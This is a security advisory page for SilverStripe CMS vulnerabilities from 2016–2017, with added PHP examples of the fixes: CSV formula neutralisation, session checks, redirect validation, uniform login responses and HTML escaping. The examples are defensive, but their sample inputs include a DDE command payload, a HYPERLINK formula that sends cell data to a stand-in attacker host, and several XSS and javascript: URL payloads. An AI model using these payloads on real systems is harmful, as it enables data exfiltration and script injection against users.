Security Releases
When potential security holes are discovered in SilverStripe's supported modules, we produce security releases to ensure that you are able to promptly secure your SilverStripe websites (check our security release process). All releases are available on our download page, and are announced on our forums (register to subscribe). Vulnerabilities in releases are disclosed here. Please subscribe to our security release RSS feed and pre-announcement mailing list to stay updated.
-
SS-2017-007: CSV Excel Macro Injection
- Severity: Low
- Identifier: SS-2017-007
- Versions Affected: 3.5.5 and below, 3.6.0 to 3.6.2, 4.0.0
- Versions Fixed: 3.5.6, 3.6.3, 4.0.1
- Release Date: 2017-12-07
In the CSV export feature of the CMS, the output may contain cell values that spreadsheet software (including Microsoft Excel) interprets as formulas, macros or scripts; if such an export is opened without sanitisation, they may be executed.
To safeguard against this, all potentially executable cell values in CSV exports are now prefixed with a literal tab character.
Reported by Ishaq Mohammed
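The mitigation described above, as an added example that is not SilverStripe's own CSV export code: any cell whose first character would make a spreadsheet evaluate it gets a literal tab prefix before the row is written with fputcsv. The member rows at the bottom are constructed sample data.

```php
<?php
// Added example, not SilverStripe's CSV export code: neutralise cell values that
// a spreadsheet would treat as a formula by prefixing a literal tab, as the fix
// for SS-2017-007 does. The sample rows below are constructed.

/** Leading characters that make Excel and LibreOffice evaluate a cell. */
const FORMULA_LEADERS = ['=', '+', '-', '@', "\t", "\r"];

/**
 * Prefix a tab when the value could be interpreted as a formula. Negative
 * numbers such as "-12.50" are prefixed too: that is the price of a
 * safe-by-default export, and a spreadsheet still displays them correctly.
 */
function neutraliseCsvCell(string $value): string
{
    if ($value !== '' && in_array($value[0], FORMULA_LEADERS, true)) {
        return "\t" . $value;
    }
    return $value;
}

/** Build a CSV document from rows of cells, neutralising every cell. */
function exportCsv(array $rows): string
{
    $stream = fopen('php://memory', 'r+');
    foreach ($rows as $row) {
        $cells = array_map('neutraliseCsvCell', array_map('strval', $row));
        // Explicit separator/enclosure and an empty escape string: fputcsv's
        // backslash "escape" is a PHP quirk that spreadsheets do not understand.
        fputcsv($stream, $cells, ',', '"', '');
    }
    rewind($stream);
    $csv = stream_get_contents($stream);
    fclose($stream);
    return $csv;
}

// Constructed member export: one surname carries a DDE payload, one a hyperlink formula.
$rows = [
    ['FirstName', 'Surname', 'Balance'],
    ['Alice', "=cmd|' /C calc'!A0", '-12.50'],
    ['Bob', '+HYPERLINK("http://attacker.test/?c="&A1,"click")', '@SUM(A1:A2)'],
    ['Carol', 'Smith', '42'],
];

echo exportCsv($rows);
```

Because the prefixed cells now start with whitespace, fputcsv quotes them, so the tab survives the round trip into a spreadsheet and the value is displayed as text. If an export must keep numeric cells numeric, restrict the prefix to string fields; the tab is still the right treatment for any free-text column an untrusted user can write to.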
-
SS-2017-006: Session user agent change detection
- Severity: Low
- Identifier: SS-2017-006
- Versions Affected: 3.5.5 and below, 3.6.0 to 3.6.2
- Versions Fixed: 3.5.6, 3.6.3
- Release Date: 2017-12-07
A protection in Session intended to guard against session hijacking was not functioning correctly. It was designed to detect changes in the User-Agent header, but modifications to this header did not actually invalidate the user's session.
Reported by Patrick Nelson - https://catchyour.com/
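What a working version of that check looks like, as an added example that is not SilverStripe's Session class: the User-Agent fingerprint is stored when the session is authenticated, compared on every request, and a mismatch clears the whole session rather than merely being noticed. A plain array stands in for $_SESSION so the script runs from the CLI; the member ID and User-Agent strings are constructed.

```php
<?php
// Added example, not SilverStripe's Session code: bind an authenticated session
// to the User-Agent seen at login and destroy it when the header changes.
// $session is a plain array standing in for $_SESSION.

function uaFingerprint(string $userAgent): string
{
    return hash('sha256', $userAgent);
}

/** Called once after credentials are verified. */
function startAuthenticatedSession(array &$session, int $memberId, string $userAgent): void
{
    $session = ['loggedInAs' => $memberId, 'ua' => uaFingerprint($userAgent)];
}

/**
 * Called on every request. Returns the member ID, or null. The advisory's bug
 * was the shape "detect the mismatch, then carry on"; the fix is that a
 * mismatch leaves nothing behind that a later request could reuse.
 */
function authenticatedMember(array &$session, string $userAgent): ?int
{
    if (!isset($session['loggedInAs'], $session['ua'])) {
        return null;
    }
    if (!hash_equals($session['ua'], uaFingerprint($userAgent))) {
        $session = [];   // with real sessions: session_unset(); session_destroy();
        return null;
    }
    return (int) $session['loggedInAs'];
}

// Constructed walk-through: login from a browser, then replay from a different client.
$browser = 'Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0';
$session = [];

startAuthenticatedSession($session, 42, $browser);
printf("same UA:      %s\n", var_export(authenticatedMember($session, $browser), true));
printf("changed UA:   %s\n", var_export(authenticatedMember($session, 'curl/7.57.0'), true));
printf("original UA:  %s (session was cleared)\n", var_export(authenticatedMember($session, $browser), true));
```

Treat User-Agent binding as defence in depth only: an attacker who can steal the session cookie usually sees the User-Agent too, and a legitimate browser update changes the header and logs the user out. It is worth having, but it does not replace HttpOnly and Secure cookie flags or session ID regeneration on login.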
-
SS-2017-005: User enumeration via timing attack on login and password reset forms
- Severity: Medium
- Identifier: SS-2017-005
- Versions Affected: 3.5.4 and below, 3.6.0 to 3.6.1
- Versions Fixed: 3.5.5, 3.6.2
- Release Date: 2017-09-28
User enumeration is possible by performing a timing attack on the login or password reset forms: the time taken to respond to submitted credentials differs depending on whether the supplied account exists.
Credit to Daniel Hensby (SilverStripe) and Erez Yalon (Checkmarx)
-
SS-2017-004: XSS in page history comparison
- Severity: Low
- Identifier: SS-2017-004
- Versions Affected: 3.4.5 and below, 3.5.0 to 3.5.3
- Versions Fixed: 3.4.6, 3.5.4, 3.6.0
- Release Date: 2017-05-31
An authenticated user with page edit permission can craft HTML which, when rendered in a page history comparison, executes client-side script.
Credit to Anti Räis for reporting this issue.
-
SS-2017-003: XSS in RedirectorPage
- Severity: Low
- Identifier: SS-2017-003
- Versions Affected: 3.4.5 and below, 3.5.0 to 3.5.3
- Versions Fixed: 3.4.6, 3.5.4, 3.6.0
- Release Date: 2017-05-31
RedirectorPage allows users to specify a malicious script rather than a URL as the redirection target, without validation. Users who follow the resulting link may have that script execute in their browser.
Credit to Wester for reporting this issue.
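The validation that was missing, as an added example that is not SilverStripe's RedirectorPage code: a redirect target is accepted only if it is an absolute http(s) URL or a site-relative path, which rules out javascript:, data: and vbscript: pseudo-URLs as well as protocol-relative hops to another host. The candidate targets at the bottom are constructed.

```php
<?php
// Added example, not SilverStripe's RedirectorPage code: validate a redirect
// target before storing or emitting it. The candidate list is constructed.

/**
 * True when $target can be emitted as a Location header or href without the
 * browser treating it as script (javascript:, data:, vbscript:) or as an
 * unintended external hop (protocol-relative "//host").
 */
function isSafeRedirectTarget(string $target): bool
{
    // Browsers drop ASCII control characters and whitespace while parsing a
    // scheme, so "java\tscript:" still runs; reject them outright. A genuine
    // URL must be percent-encoded, so it never contains them.
    if ($target === '' || preg_match('/[\x00-\x20\x7f]/', $target)) {
        return false;
    }

    // Site-relative path: "/about-us" yes; "//attacker.test" and "/\attacker.test"
    // (which browsers normalise to the same thing) no.
    if ($target[0] === '/') {
        return !preg_match('#^/[/\\\\]#', $target);
    }

    // Anything else must parse as an absolute URL with an http(s) scheme and a host.
    $parts = parse_url($target);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    return in_array(strtolower($parts['scheme']), ['http', 'https'], true);
}

/** How a page controller would use it: fall back to the home page on rejection. */
function resolveRedirect(string $stored, string $fallback = '/'): string
{
    return isSafeRedirectTarget($stored) ? $stored : $fallback;
}

$candidates = [
    'https://www.example.test/page',
    '/about-us?x=1',
    '//attacker.test/',
    'javascript:alert(document.cookie)',
    "java\tscript:alert(1)",
    'JavaScript:alert(1)',
    'data:text/html,<script>alert(1)</script>',
    'ftp://example.test/file',
    'example.test/path',
];

foreach ($candidates as $c) {
    printf("%-48s %s\n", json_encode($c), isSafeRedirectTarget($c) ? 'allowed' : 'rejected');
}
printf("resolved: %s\n", resolveRedirect('javascript:alert(1)'));
```

Run the check both when the value is saved in the CMS and again when it is used, so that a record written before the fix, or through another code path, cannot bypass it.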
-
SS-2017-002: Member disclosure in login form
- Severity: Low
- Identifier: SS-2017-002
- Versions Affected: 3.4.5 and below, 3.5.0 to 3.5.3
- Versions Fixed: 3.4.6, 3.5.4, 3.6.0
- Release Date: 2017-05-31
There is a user ID enumeration vulnerability in the brute-force lockout error messages:
- Users that don't exist never get a locked-out message
- Users that do exist get a locked-out message
This means an attacker can infer or confirm which user details exist in the Member table.
The issue has been resolved by ensuring that login attempt logging and the lockout process behave identically for non-existent users and for existing users.
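Both this advisory and SS-2017-005 above come down to the same property: the login path must do the same work and give the same answers whether or not the submitted account exists. The following added example, which is not SilverStripe's MemberAuthenticator or LoginAttempt code, shows the vulnerable shape next to a hardened one. Failed attempts are counted per submitted email regardless of existence, and password_verify always runs, against a throwaway hash when there is no member, so the timing and the messages match. The member table and attempt log are constructed in-memory arrays.

```php
<?php
// Added example, not SilverStripe's MemberAuthenticator or LoginAttempt code:
// a login check whose work and error messages are identical for existing and
// non-existent accounts (SS-2017-005 timing, SS-2017-002 lockout message).
// $members and $attempts are constructed in-memory stand-ins.

const MAX_ATTEMPTS = 3;

/**
 * Vulnerable shape: returns before any hashing when the email is unknown, so
 * the response is faster, and unknown emails never accumulate a lockout.
 */
function loginVulnerable(array $members, array &$attempts, string $email, string $password): string
{
    if (!isset($members[$email])) {
        return 'invalid';
    }
    if (($attempts[$email] ?? 0) >= MAX_ATTEMPTS) {
        return 'locked';
    }
    if (!password_verify($password, $members[$email])) {
        $attempts[$email] = ($attempts[$email] ?? 0) + 1;
        return 'invalid';
    }
    return 'ok';
}

/** A hash of a random throwaway password, computed once per process. */
function dummyHash(): string
{
    static $hash = null;
    return $hash ??= password_hash(bin2hex(random_bytes(16)), PASSWORD_DEFAULT);
}

/**
 * Hardened shape: attempts are counted per submitted email whether or not it
 * exists, and password_verify always runs (against the dummy hash for unknown
 * emails) so both paths cost about the same and say the same thing.
 */
function loginHardened(array $members, array &$attempts, string $email, string $password): string
{
    $count = $attempts[$email] ?? 0;
    if ($count >= MAX_ATTEMPTS) {
        return 'locked';
    }
    $exists   = isset($members[$email]);
    $verified = password_verify($password, $exists ? $members[$email] : dummyHash());
    if (!($exists && $verified)) {
        $attempts[$email] = $count + 1;
        return 'invalid';
    }
    $attempts[$email] = 0;
    return 'ok';
}

// Constructed data: one real member. Lookups are case-sensitive here for brevity.
$members = ['alice@example.test' => password_hash('correct horse', PASSWORD_DEFAULT)];
dummyHash();   // warm the dummy hash so the timing below reflects steady state

foreach (['loginVulnerable', 'loginHardened'] as $fn) {
    $attempts = [];
    foreach (['alice@example.test', 'nobody@example.test'] as $email) {
        $results = [];
        $start = hrtime(true);
        for ($i = 0; $i < MAX_ATTEMPTS + 1; $i++) {
            $results[] = $fn($members, $attempts, $email, 'wrong password');
        }
        $ms = (hrtime(true) - $start) / 1e6;
        printf("%-16s %-22s %-32s %7.1f ms\n", $fn, $email, implode(',', $results), $ms);
    }
}
```

In the vulnerable run the unknown address answers in well under a millisecond and never locks, while the real one takes several bcrypt verifications and then locks; in the hardened run both addresses produce the same sequence of messages in roughly the same time. The remaining observable difference is the cost of the dummy hash itself, which is why it is computed once and reused rather than generated per request.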
-
SS-2017-001: XSS In page name
- Severity: Low
- Identifier: SS-2017-001
- Versions Affected: 3.5.1 and below
- Versions Fixed: 3.4.4, 3.5.2
- Release Date: 2017-01-31
Page name `"><svg/onload=alert(/xss/)>` will trigger an XSS alert.
Credit to Edric Teo - https://smarterbitbybit.com
-
SS-2016-016: XSS In CMSSecurity BackURL
- Severity: Low
- Identifier: SS-2016-016
- Versions Affected: 3.1.20 and below, 3.2.0 to 3.2.5, 3.3.0 to 3.3.3
- Versions Fixed: 3.1.21, 3.2.6, 3.3.4, 3.4.2, 3.5.0
- Release Date: 2016-11-29
As a follow-up to SS-2016-001, one minor case of an incorrectly encoded URL (the CMSSecurity BackURL parameter) remained unresolved and is fixed in this release.
Credit: David Júlio for reporting.
-
SS-2016-010: ReadOnly transformation for formfields exploitable
- Severity: Low
- Identifier: SS-2016-010
- Versions Affected: 3.1.20 and below, 3.2.0 to 3.2.5, 3.3.0 to 3.3.3
- Versions Fixed: 3.1.21, 3.2.6, 3.3.4, 3.4.2, 3.5.0
- Release Date: 2016-11-29
Form fields whose isReadonly() returns true are vulnerable to reflected XSS. This includes ReadonlyField, LookupField, HTMLReadonlyField, and special-purpose fields such as TimeField_Readonly. Values submitted through these form fields are not filtered out of the form's session data and may be shown back to the user depending on the form's behaviour; for example, a validation error re-renders the form with the previously submitted values by default.
SilverStripe forms automatically load values from request data (GET and POST), which enables malicious use of crafted URLs if your form uses these fields and does not overwrite the data when the form is constructed.
Readonly and disabled form fields are already filtered out in Form->saveInto(), so maliciously submitted data for these fields does not reach the database unless your saving logic reads form values directly.
Discovered by staff of security-assessment.com, a division of Dimension Data.
-
SS-2016-015: XSS In OptionsetField and CheckboxSetField
- Severity: Low
- Identifier: SS-2016-015
- Versions Affected: 3.1.19, 3.2.4, 3.3.2, 3.4.0
- Versions Fixed: 3.1.20, 3.2.5, 3.3.3, 3.4.1
- Release Date: 2016-08-15
The list of key/value pairs assigned to an OptionsetField or CheckboxSetField has no default casting, so a key or value containing HTML is rendered unescaped, giving a potential XSS vulnerability.
-
SS-2016-014: Pre-existing alc_enc cookies log users in if remember me is disabled
- Severity: Low
- Identifier: SS-2016-014
- Versions Affected: 3.1.19, 3.2.4, 3.3.2, 3.4.0
- Versions Fixed: 3.1.20, 3.2.5, 3.3.3, 3.4.1
- Release Date: 2016-08-15
If the "remember me" feature was enabled and a user logged in with the box checked, and the developer later disabled the feature, the user's pre-existing alc_enc cookie would continue to authenticate them.
Reported by Patrick Nelson - https://catchyour.com/
-
SS-2016-013: Member.Name isn't escaped
- Severity: Low
- Identifier: SS-2016-013
- Versions Affected: 3.1.19, 3.2.4, 3.3.2, 3.4.0
- Versions Fixed: 3.1.20, 3.2.5, 3.3.3, 3.4.1
- Release Date: 2016-08-15
The core template framework/templates/Includes/GridField_print.ss uses "Printed by $Member.Name".
If the currently logged-in member's first name or surname contains HTML, it is printed raw, because Member->getName() simply returns FirstName and Surname concatenated as a string, and that string is injected into the template without escaping.
Credit to Matt Peel for reporting.
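This advisory, SS-2016-015 (OptionsetField keys and values) and SS-2017-001 (page name) all share one root cause: untrusted strings reached HTML without a default escaping step. The following added example, not SilverStripe's template or casting code, shows escape-by-default rendering with an explicit opt-out for markup that is already trusted, applied to the three contexts the advisories name: a heading, an option set's value attributes and labels, and the "Printed by" line. The page name, option labels and member names are constructed samples using the payload shape from SS-2017-001.

```php
<?php
// Added example, not SilverStripe's template or casting code: escape-by-default
// rendering, which is the property the three advisories above were missing.
// All sample values are constructed.

/** Marks a string that is already safe HTML and must not be escaped again. */
final class HtmlFragment
{
    public function __construct(public string $html) {}
}

/** Escape for text and attribute context; HtmlFragment passes through. */
function h(mixed $value): string
{
    if ($value instanceof HtmlFragment) {
        return $value->html;
    }
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * Render an option set. Both keys (value attributes) and values (labels) are
 * untrusted and go through h(); ENT_QUOTES makes the attribute context safe.
 */
function renderOptionset(string $name, array $options, ?string $selected = null): string
{
    $out = '';
    foreach ($options as $key => $label) {
        $key     = (string) $key;
        $checked = $key === $selected ? ' checked' : '';
        $out .= sprintf(
            '<label><input type="radio" name="%s" value="%s"%s> %s</label>' . "\n",
            h($name), h($key), $checked, h($label)
        );
    }
    return $out;
}

/** The GridField_print.ss case: a member name interpolated into a template. */
function renderPrintedBy(string $firstName, string $surname): string
{
    return 'Printed by ' . h($firstName . ' ' . $surname);
}

$pageName = '"><svg/onload=alert(/xss/)>';

echo '<h1>' . h($pageName) . "</h1>\n";
echo renderOptionset('Layout', [$pageName => '<b>bold</b> label', 'plain' => 'Plain'], 'plain');
echo renderPrintedBy('<img src=x onerror=alert(1)>', 'Smith'), "\n";
echo '<p>' . h(new HtmlFragment('<em>trusted markup</em>')) . "</p>\n";
```

The important design choice is that the opt-out is a distinct type rather than a flag on the string: a plain string can never be rendered raw by accident, and every place that constructs an HtmlFragment is a reviewable point where someone has asserted the markup is safe.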
-
SS-2016-012: Missing ACL on reports
- Severity: Low
- Identifier: SS-2016-012
- Versions Affected: 3.1.19, 3.2.4, 3.3.2, 3.4.0
- Versions Fixed: 3.1.20, 3.2.5, 3.3.3, 3.4.1
- Release Date: 2016-08-15
SS_Report and the Reports CMS section only check canView() when listing the reports the current user may see.
They do not (but should) perform the canView() check when a report is actually viewed, so anyone who knows a report's URL and can otherwise access the Reports section of the CMS can view any report.
Credit to Matt Peel for reporting.
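The general rule is that a permission check on a listing is a convenience, not a control: the check has to be repeated wherever the resource is actually fetched. The following added example, not SilverStripe's SS_Report or ReportAdmin code, applies the same canView() test both when building the report list and when a report is requested by its URL segment. The member, permission names and report classes are constructed for the example.

```php
<?php
// Added example, not SilverStripe's SS_Report or ReportAdmin code: the same
// canView() check at listing time and at view time, so knowing a report's URL
// is not enough. All classes and permission codes here are constructed.

final class Member
{
    public function __construct(public string $name, public array $permissions) {}
    public function can(string $perm): bool
    {
        return in_array($perm, $this->permissions, true);
    }
}

abstract class Report
{
    abstract public function id(): string;
    abstract public function canView(Member $m): bool;
    public function render(): string
    {
        return 'Report ' . $this->id();
    }
}

final class BrokenLinksReport extends Report
{
    public function id(): string { return 'broken-links'; }
    public function canView(Member $m): bool { return $m->can('CMS_ACCESS_ReportAdmin'); }
}

final class SalaryReport extends Report
{
    public function id(): string { return 'salaries'; }
    public function canView(Member $m): bool { return $m->can('ADMIN'); }
}

final class ReportAdmin
{
    /** @param Report[] $reports */
    public function __construct(private array $reports) {}

    /** Listing: only the reports this member may view (the part that already worked). */
    public function listReports(Member $m): array
    {
        $visible = array_filter($this->reports, fn (Report $r) => $r->canView($m));
        return array_values(array_map(fn (Report $r) => $r->id(), $visible));
    }

    /** Direct view by URL segment: repeat the check and answer 403 on failure. */
    public function show(string $id, Member $m): array
    {
        foreach ($this->reports as $r) {
            if ($r->id() === $id) {
                return $r->canView($m) ? [200, $r->render()] : [403, 'Forbidden'];
            }
        }
        return [404, 'Not found'];
    }
}

$admin  = new ReportAdmin([new BrokenLinksReport(), new SalaryReport()]);
$editor = new Member('editor', ['CMS_ACCESS_ReportAdmin']);

// The editor's listing, then the editor guessing the salary report's URL directly.
print_r($admin->listReports($editor));
print_r($admin->show('salaries', $editor));
print_r($admin->show('broken-links', $editor));
```

Answering 403 rather than 404 for a report the member may not view is a choice: it confirms the report exists, which is fine inside an authenticated CMS but may not be what you want on a public endpoint.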
-
SS-2016-011: ChangePasswordForm doesn't check Member::canLogIn()
- Severity: Low
- Identifier: SS-2016-011
- Versions Affected: 3.1.19, 3.2.4, 3.3.2, 3.4.0
- Versions Fixed: 3.1.20, 3.2.5, 3.3.3, 3.4.1
- Release Date: 2016-08-15
After performing a password reset, ChangePasswordForm::doChangePassword() logs in the user without checking Member::canLogIn(). This presents an issue for sites that are using the extension point in that method to deny access to users (for example members that have not been “approved”, or members that have had their access revoked temporarily). It looks like Member::canLogIn() was originally designed to only be used for checking whether the user is locked out (due to too many incorrect login attempts) but has been opened up to other uses.
Credit to Loz Calver
-
SS-2016-008: Password encryption salt expiry
- Severity: Low
- Identifier: SS-2016-008
- Versions Affected: 3.1.19, 3.2.4, 3.3.2, 3.4.0
- Versions Fixed: 3.1.20, 3.2.5, 3.3.3, 3.4.1
- Release Date: 2016-08-15
When a user changes their password, the internal salt used for hashing their password is not updated.
Although this is not considered a security vulnerability, this behaviour has been improved to ensure the salt is reset on change of password.
Credit to Jono Menz.